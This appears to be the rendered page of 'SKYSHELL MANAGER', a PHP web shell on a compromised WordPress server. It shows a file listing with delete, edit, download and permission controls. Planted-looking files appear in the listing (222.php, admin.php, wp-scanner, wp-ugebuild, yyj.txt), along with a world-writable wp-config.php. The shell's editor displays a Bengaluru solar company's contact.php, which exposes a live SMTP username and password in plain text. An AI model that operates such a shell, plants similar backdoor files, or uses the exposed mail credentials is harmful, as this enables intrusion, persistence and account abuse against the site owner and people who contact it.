📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
surefundeals
/
Name
Size
Perm
Actions
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.51 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
222.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.4 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.54 KB
0666
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.gz
21.5 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.php
0.15 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
31.88 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.94 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.gz
47.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.php
0.16 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
yyj.txt
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: contact.php
<!DOCTYPE html> <!--[if lt IE 7]><html class="no-js lt-ie10 lt-ie9 lt-ie8 lt-ie7"> <![endif]--> <!--[if IE 7]><html class="no-js lt-ie10 lt-ie9 lt-ie8"> <![endif]--> <!--[if IE 8]><html class="no-js lt-ie10 lt-ie9"> <![endif]--> <!--[if IE 9]><html class="no-js lt-ie10"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js"> <!--<![endif]--> <head> <!-- Basic Page Needs --> <meta charset="utf-8"> <title>Finesolartools</title> <meta name="description" content=""> <meta name="author" content=""> <!-- Mobile Specific Metas --> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <!-- Favicons --> <link rel="shortcut icon" href="content/ski/images/favicon.ico"> <!-- FONTS --> <link rel='stylesheet' href='http://fonts.googleapis.com/css?family=Roboto:100,300,400,400italic,700'> <link rel='stylesheet' href='http://fonts.googleapis.com/css?family=Patua+One:100,300,400,400italic,700'> <link rel='stylesheet' href='http://fonts.googleapis.com/css?family=Lato:100,300,400'> <!-- CSS --> <link rel='stylesheet' href='css/global.css'> <link rel='stylesheet' href='content/ski/css/structure.css'> <link rel='stylesheet' href='content/ski/css/ski.css'> <link rel='stylesheet' href='content/ski/css/custom.css'> <!-- Revolution Slider --> <link rel="stylesheet" href="plugins/rs-plugin/css/settings.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"> <!--recaptcha --> <style> #g-recaptcha-response { display: block !important; position: absolute; margin: -78px 0 0 0 !important; width: 302px !important; height: 76px !important; z-index: -999999; opacity: 0; } </style> <script> window.addEventListener('load', () => { const $recaptcha = document.querySelector('#g-recaptcha-response'); if ($recaptcha) { $recaptcha.setAttribute('required', 'required'); } }) </script> <script src="https://www.google.com/recaptcha/api.js" async defer></script> <!--recaptcha --> <style> .form-wrapper { display: flex; justify-content: center; /* horizontal center */ align-items: center; /* vertical center */ min-height: 80px; } .subscribe-box { display: flex; max-width: 450px; width: 100%; border: 2px solid #fff; border-radius: 30px; overflow: hidden; /* 🔥 important */ background: transparent; } .subscribe-box input { flex: 1; padding: 12px 15px; border: none; outline: none; background: #cfd6dc; /* light grey like your image */ font-size: 14px; } .subscribe-box button { padding: 12px 25px; border: none; background: #fe0713; color: #fff; font-weight: 500; cursor: pointer; } /* remove extra spacing issues */ .subscribe-box input, .subscribe-box button { margin: 0; } /* hover effect */ .subscribe-box button:hover { background: #c9030c; } </style> </head> <body class="template-slider layout-full-width one-page nice-scroll-on mobile-tb-left no-content-padding header-stack header-center minimalist-header sticky-header sticky-white ab-hide subheader-title-left menu-highlight menuo-no-borders footer-copy-center tr-content"> <!-- Main Theme Wrapper --> <div id="Wrapper"> <!-- Header Wrapper --> <div id="Header_wrapper"> <!-- Header --> <header id="Header"> <!-- Header - Logo and Menu area --> <div id="Top_bar"> <div class="container"> <div class="column one"> <div class="top_bar_left clearfix"> <!-- Logo--> <div class="logo"> <a id="logo" href="index.php" title="Finesolartools"><img class="logo-main scale-with-grid" src="content/ski/images/solar.png" /><img class="logo-sticky scale-with-grid" src="content/ski/images/solar.png"><img class="logo-mobile scale-with-grid" src="content/ski/images/solar.png"> </a> </div> <!-- Main menu--> <div class="menu_wrapper"> <nav id="menu" class="menu-main-menu-container"> <ul id="menu-main-menu" class="menu"> <li> <a href="index.php"><span>Home</span></a> </li> <li> <a href="about.php"><span>About Us</span></a> </li> <li> <a href="#0"><span>Services</span></a> <ul id="menu-main-menu" class="menu"> <li> <a href="installation.php"><span>Installation</span></a> </li> <li> <a href="solar-rooftop-system.php"><span>Solar Rooftop System</span></a> </li> <li> <a href="solar-ground-mounted-system.php"><span>Ground-Mounted System</span></a> </li> <li> <a href="solar-amc-services.php"><span>Solar AMC Services</span></a> </li> <li> <a href="solar-streetlight-service.php"><span>Solar Streetlight Service</span></a> </li> </ul> </li> <li> <a href="contact.php"><span>Contact Us</span></a> </li> </ul> </nav><a class="responsive-menu-toggle" href="#"><i class="icon-menu"></i></a> </div> <!-- Secondary menu area - only for certain pages --> <div class="secondary_menu_wrapper"></div> <!-- Banner area - only for certain pages--> <div class="banner_wrapper"></div> <!-- Header Searchform area--> <div class="search_wrapper"> <form method="get"> <i class="icon_search icon-search"></i><a href="#" class="icon_close"><i class="icon-cancel"></i></a> <input type="text" class="field" name="s" id="s" placeholder="Enter your search" /> <input type="submit" class="submit" value="" style="display:none;" /> </form> </div> </div> </div> </div> </div> </header> </div> <!-- Main Content --> <div id="Content"> <div class="content_wrapper clearfix"> <div class="sections_group"> <div class="entry-content"> <div class="section mcb-section full-width" id="contact" style="padding-top:60px; padding-bottom:0px;"> <div class="section_wrapper mcb-section-inner"> <div class="wrap mcb-wrap one clearfix"> <!-- One Full Row--> <div class="column mcb-column one column_column"> <div class="column_attr align_center"> <h2>Contact us</h2> </div> </div> <!-- One Full Row--> <div class="column mcb-column one column_divider"> <hr class="no_line" style="margin: 0 auto 40px;" /> </div> <!-- One Full Row--> <div class="column mcb-column one column_map"> <!-- Google map area --> <div class="google-map-wrapper no_border"> <div class="google-map-contact-wrapper"> <div class="get_in_touch"> <h3>Get in touch</h3> <div class="get_in_touch_wrapper"> <ul> <li class="address"> <span class="icon"><i class="icon-location"></i></span><span class="address_wrapper"><strong>Finesolartools</strong> <br> No 45 Outer Ring Road, <br> Marathahalli, Bengaluru, <br> Karnataka 560037, India. </span> </li> <li class="phone"> <span class="icon"><i class="icon-phone"></i></span> <p> <a href="tel:+91 9876 543 210">+91 9876 543 210</a> </p> </li> <li class="mail"> <span class="icon"><i class="icon-mail"></i></span> <p> <a href="mailto:contact@finesolartools.com">contact@finesolartools.com</a> </p> </li> </ul> </div> </div> </div> <div class="google-map" style="width:100%; height:550px;"> <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3888.2383063294515!2d77.69261548507711!3d12.956597182625414!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3bae13ccecd24dc9%3A0x6badb44023aa1fe4!2s45%2C%20Outer%20Ring%20Rd%2C%20Marathahalli%20Village%2C%20Marathahalli%2C%20Bengaluru%2C%20Karnataka%20560037!5e0!3m2!1sen!2sin!4v1774268857870!5m2!1sen!2sin" width="100%" height="600" style="border:0;" allowfullscreen="" loading="lazy" referrerpolicy="no-referrer-when-downgrade"></iframe> </div> </div> </div> </div> </div> </div> <div class="section mcb-section" style="padding-top:80px; padding-bottom:50px; background-color:rgba(18,82,147,.1)"> <div class="section_wrapper mcb-section-inner"> <div class="wrap mcb-wrap one clearfix"> <!-- One Second (1/2) Column --> <div class="column mcb-column one-second column_column"> <div class="column_attr animate" data-anim-type="fadeInLeft" style="padding:0 10% 0 0;"> <h3>Submit your below details:</h3> </div> <div class="contact-section"> <form method="post" action="contact.php" class="contact-form"> <div class="input-group"> <input type="text" name="name" placeholder="Your Name" required> </div> <div class="input-group"> <input type="email" name="email" placeholder="Your Email" required> </div> <div class="input-group"> <input type="tel" name="phone" placeholder="Your Phone"> </div> <div class="input-group"> <textarea placeholder="Your Message" name="message" rows="4" required></textarea> </div> <div class="g-recaptcha" data-sitekey="6LffKpYsAAAAAEydgIJ3Kzqa3asNxu-mHhwM7wVt"></div><br> <button type="submit" name="Submit">Send Message</button> </form> <?php session_start(); use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\SMTP; use PHPMailer\PHPMailer\Exception; require_once __DIR__ . '/../vendor/phpmailer/src/PHPMailer.php'; require_once __DIR__ . '/../vendor/phpmailer/src/SMTP.php'; require_once __DIR__ . '/../vendor/phpmailer/src/Exception.php'; if (isset($_POST['Submit'])) { // Sanitize input $name = filter_var($_POST['name'], FILTER_SANITIZE_STRING); $email = filter_var($_POST['email'], FILTER_VALIDATE_EMAIL); $message = htmlspecialchars($_POST['message'], ENT_QUOTES, 'UTF-8'); $honeypot = $_POST['website'] ?? ''; // Validation if (!$email || empty($name) || empty($email)) { die("Invalid input. Please fill the form correctly."); } // Honeypot check if (!empty($honeypot)) { die("Spam detected!"); } // Prevent duplicate submissions within 1 minute if (isset($_SESSION['last_submit_time']) && time() - $_SESSION['last_submit_time'] < 60) { die("You already submitted recently. Please wait before trying again."); } $_SESSION['last_submit_time'] = time(); try { // --- Mail to Subscriber --- $mail = new PHPMailer(true); $mail->isSMTP(); $mail->Host = 'smtp.mail.us-east-1.awsapps.com'; $mail->SMTPAuth = true; $mail->SMTPSecure = 'ssl'; $mail->Port = 465; $mail->Username = 'contact@finesolartools.com'; // YOUR Gmail/SMTP email $mail->Password = 'n-8u@3JATU@I'; // YOUR Gmail/SMTP app password $mail->setFrom('contact@finesolartools.com', 'Finesolartools'); $mail->addAddress($email, $name); $mail->addReplyTo('contact@finesolartools.com', 'Finesolartools'); $mail->isHTML(true); $mail->Subject = "Contact Replay"; $mail->Body=' <body style="margin:0; padding:0; background-color:#f1f2f5; font-family:Roboto, Arial, sans-serif; color:#1e3557;"> <table role="presentation" width="100%" border="0" cellspacing="0" cellpadding="0" style="background-color:#f1f2f5; margin:0; padding:0; margin-bottom:30px;"> <tr> <td align="center" style="padding:0; margin:0;"> <table role="presentation" width="600" border="0" cellspacing="0" cellpadding="0" style="background-color:#0b1a4a; padding:40px 0; margin-top:30px;"> <tr><td></td></tr> </table> <table role="presentation" width="600" border="0" cellspacing="0" cellpadding="0" style="background-color:#ffffff; border-radius:6px; max-width:600px; width:100%;"> <tr> <td align="center" style="padding:20px 20px;"> <table role="presentation" width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center" style="padding:20px 0;"> <h3 style="font-size: 22px;">Finesolartools</h3> </td> </tr> </table> <table role="presentation" width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="left" style="font-size:14px; line-height:22px; color:#1e3557;"> <p style="margin:0 0 15px 0;"><b>Hi '.$name.',</b></p> <p style="margin:0 0 15px 0;"> Thank you for reaching out to us through Finesolartools. </p> <p style="margin:0 0 15px 0;"> We have received your message and truly appreciate you taking the time to contact us. Our team is currently reviewing your inquiry, and we will get back to you as soon as possible with the relevant information. </p> <p style="margin:0 0 15px 0;"> If your request is urgent, please feel free to reply to this email or contact us directly using the details provided on our website. </p> <p style="margin:0;"><b>Warm regards,</b><br><b>Finesolartools</b></p> </td> </tr> </table> <table role="presentation" width="100%" border="0" cellspacing="0" cellpadding="0" style="margin-top:30px;"> <tr> <td align="center" style="font-size:12px; color:#566881;"> <p style="margin:0 0 10px 0;"> You are receiving this email because you contacted Finesolartools. </p> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </body>'; $mail->send(); // --- Mail to Admin --- $mail2 = new PHPMailer(true); $mail2->isSMTP(); $mail2->Host = 'smtp.mail.us-east-1.awsapps.com'; $mail2->SMTPAuth = true; $mail2->SMTPSecure = 'ssl'; $mail2->Port = 465; $mail2->Username = 'contact@finesolartools.com'; $mail2->Password = 'n-8u@3JATU@I'; $mail2->setFrom('contact@finesolartools.com', 'Finesolartools'); $mail2->addAddress('contact@finesolartools.com', 'Finesolartools'); $mail2->isHTML(true); $mail2->Subject = "Contact Details"; $mail2->Body=' <body style="margin:0; padding:0; background-color:#f1f2f5; font-family:Roboto, Arial, sans-serif; color:#1e3557;"> <table role="presentation" width="100%" border="0" cellspacing="0" cellpadding="0" style="background-color:#f1f2f5; margin:0; padding:0; margin-bottom:30px;"> <tr> <td align="center" style="padding:0; margin:0;"> <table role="presentation" width="600" border="0" cellspacing="0" cellpadding="0" style="background:linear-gradient(80deg, rgb(42,204,222) 0%, rgb(214,83,119) 50%, rgb(130,33,215) 100%); padding:40px 0; margin-top:30px;"> <tr><td></td></tr> </table> <table role="presentation" width="600" border="0" cellspacing="0" cellpadding="0" style="background-color:#ffffff; border-radius:6px; max-width:600px; width:100%;"> <tr> <td align="center" style="padding:20px 20px;"> <table role="presentation" width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center" style="padding:20px 0;"> <h3 style="font-size: 22px;">Finesolartools</h3> </td> </tr> </table> <table role="presentation" width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="left" style="font-size:14px; line-height:22px; color:#1e3557;"> <p style="margin:0 0 15px 0;"><b>contact details,</b></p> <p style="margin:0 0 15px 0;"> Following user has submitted their contact details: </p> <p style="margin:0 0 15px 0;"> Name: '.$name.' <br> Email: '.$email.' <br> Message: '.$message.' </p> <p style="margin:0;">Regards,<br>Finesolartools</p> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </body>'; $mail2->send(); echo "<p style='color:#000000;padding-top: 10px;'>Thank you for your email.</p>"; } catch (Exception $e) { echo "Mailer Error: " . $e->getMessage(); } } ?> </div> </div> </div> </div> </div> <div class="section the_content no_content"> <div class="section_wrapper"> <div class="the_content_wrapper"></div> </div> </div> </div> </div> </div> </div> <!-- Footer--> <footer id="Footer" class="clearfix"> <!-- Footer copyright--> <div class="footer_copy"> <div class="container"> <div class="column one"> <div class="column_attr align_center animate" data-anim-type="bounceIn"> <form class="subscribe-form" method="post" id="sub"> <div class="form-wrapper"> <div class="subscribe-box"> <input type="email" name="email" placeholder="Enter your email address" required> <button type="submit" name="submit">Subscribe</button> </div> </div> </form> <div id="loader" style="display:none;color: #ffffff;padding-top: 10px;">Processing...</div> <div id="responseMessage" style="color: #ffffff;padding-top: 10px;"></div> <script> document.getElementById("sub").addEventListener("submit", function(event) { event.preventDefault(); let form = this; let formData = new FormData(form); // Show loader document.getElementById("loader").style.display = "block"; document.getElementById("responseMessage").innerText = ""; fetch("sub.php", { method: "POST", body: formData }) .then(response => response.text()) .then(data => { // Hide loader document.getElementById("loader").style.display = "none"; // Display server message document.getElementById("responseMessage").innerText = data.trim(); // Clear email field form.reset(); }) .catch(error => { document.getElementById("loader").style.display = "none"; document.getElementById("responseMessage").innerText = "An error occurred."; }); }); </script> <p>At Finesolartools, we are committed to powering a brighter and more sustainable future through reliable solar energy solutions in Bengaluru. With a strong focus on quality, innovation, and customer satisfaction, we specialize in end-to-end solar services from consultation and design to installation and maintenance.</p> <p>Our mission is to make clean energy accessible and affordable for homes, businesses, and industries. We understand the growing need for eco-friendly power, and our expert team works closely with clients to deliver customized solar solutions that maximize efficiency and savings.</p> <p>Backed by industry knowledge and the latest technology, Finesolartools ensures every project is executed with precision and care. Whether you're looking to reduce electricity costs or contribute to a greener environment, we are here to help you transition seamlessly to solar energy.</p> <p>We take pride in building long-term relationships with our customers by providing transparent service, trusted products, and ongoing support.</p> <p>Switch to smart energy. Switch to Finesolartools.</p> </div> <div class="copyright" style="font-size: 12px;"> <a href="privacy.php">Privacy Policy</a> | <a href="terms.php">Terms & Conditions</a> | <a href="subscribe.php">Subscribe</a> | <a href="unsubscribe.php">Unsubscribe</a> <br> © 2026 Finesolartools. All rights reserved. </div> <!--Social info area--> </div> </div> </div> </footer> </div> <!-- JS --> <script src="js/jquery-3.6.0.min.js"></script> <script src="js/jquery-migrate-3.4.0.min.js"></script> <script src="js/mfn.menu.js"></script> <script src="js/jquery.plugins.js"></script> <script src="js/jquery.jplayer.min.js"></script> <script src="js/animations/animations.js"></script> <script src="js/scripts.js"></script> <script src="plugins/rs-plugin/js/jquery.themepunch.tools.min.js"></script> <script src="plugins/rs-plugin/js/jquery.themepunch.revolution.min.js"></script> <script src="plugins/rs-plugin/js/extensions/revolution.extension.video.min.js"></script> <script src="plugins/rs-plugin/js/extensions/revolution.extension.slideanims.min.js"></script> <script src="plugins/rs-plugin/js/extensions/revolution.extension.actions.min.js"></script> <script src="plugins/rs-plugin/js/extensions/revolution.extension.layeranimation.min.js"></script> <script src="plugins/rs-plugin/js/extensions/revolution.extension.kenburn.min.js"></script> <script src="plugins/rs-plugin/js/extensions/revolution.extension.navigation.min.js"></script> <script src="plugins/rs-plugin/js/extensions/revolution.extension.migration.min.js"></script> <script src="plugins/rs-plugin/js/extensions/revolution.extension.parallax.min.js"></script> <script src="http://maps.google.com/maps/api/js?sensor=false&ver=5.9"></script> <script src="js/email.js"></script> <script> var tpj = jQuery; var revapi1; tpj(document).ready(function() { if (tpj("#rev_slider_1_2").revolution == undefined) { revslider_showDoubleJqueryError("#rev_slider_1_2"); } else { revapi1 = tpj("#rev_slider_1_2").show().revolution({ sliderType:"hero", sliderLayout:"auto", dottedOverlay:"none", delay: 9000, navigation: {}, visibilityLevels: [1240, 1024, 778, 480], gridwidth: 1240, gridheight: 700, lazyType:"none", shadow: 0, spinner:"off", autoHeight:"off", disableProgressBar:"on", hideThumbsOnMobile:"off", hideSliderAtLimit: 0, hideCaptionAtLimit: 0, hideAllCaptionAtLilmit: 0, debugMode: false, fallbacks: { simplifyAll:"off", disableFocusListener: false, } }); } }); /*]]>*/ </script> <script> function google_maps_56854e1139a12() { var latlng = new google.maps.LatLng(-33.8710, 151.2039); var draggable = true; var myOptions = { zoom: 13, center: latlng, mapTypeId: google.maps.MapTypeId.ROADMAP, styles: [{ "featureType":"administrative", "elementType":"labels.text.fill", "stylers": [{ "color":"#444444" }] }, { "featureType":"landscape", "elementType":"all", "stylers": [{ "color":"#f2f2f2" }] }, { "featureType":"poi", "elementType":"all", "stylers": [{ "visibility":"off" }] }, { "featureType":"road", "elementType":"all", "stylers": [{ "saturation": -100 }, { "lightness": 45 }] }, { "featureType":"road.highway", "elementType":"all", "stylers": [{ "visibility":"simplified" }] }, { "featureType":"road.arterial", "elementType":"labels.icon", "stylers": [{ "visibility":"off" }] }, { "featureType":"transit", "elementType":"all", "stylers": [{ "visibility":"off" }] }, { "featureType":"water", "elementType":"all", "stylers": [{ "color":"#46bcec" }, { "visibility":"on" }] }], draggable: draggable, zoomControl: true, mapTypeControl: false, streetViewControl: false, scrollwheel: false }; var map = new google.maps.Map(document.getElementById("google-map-area-56854e1139a12"), myOptions); var marker = new google.maps.Marker({ position: latlng, icon:"content/ski/images/home_ski_pin.png", map: map }); } jQuery(document).ready(function($) { google_maps_56854e1139a12(); }); </script> <script> jQuery(window).on('load', function () { var retina = window.devicePixelRatio> 1 ? true : false; if (retina) { var retinaEl = jQuery("#logo img.logo-main"); var retinaLogoW = retinaEl.width(); var retinaLogoH = retinaEl.height(); retinaEl.attr("src","content/ski/images/solar.png").width(retinaLogoW).height(retinaLogoH); var stickyEl = jQuery("#logo img.logo-sticky"); var stickyLogoW = stickyEl.width(); var stickyLogoH = stickyEl.height(); stickyEl.attr("src","content/ski/images/solar.png").width(stickyLogoW).height(stickyLogoH); var mobileEl = jQuery("#logo img.logo-mobile"); var mobileLogoW = mobileEl.width(); var mobileLogoH = mobileEl.height(); mobileEl.attr("src","content/ski/images/solar.png").width(mobileLogoW).height(mobileLogoH); } }); </script> </body> </html>
Save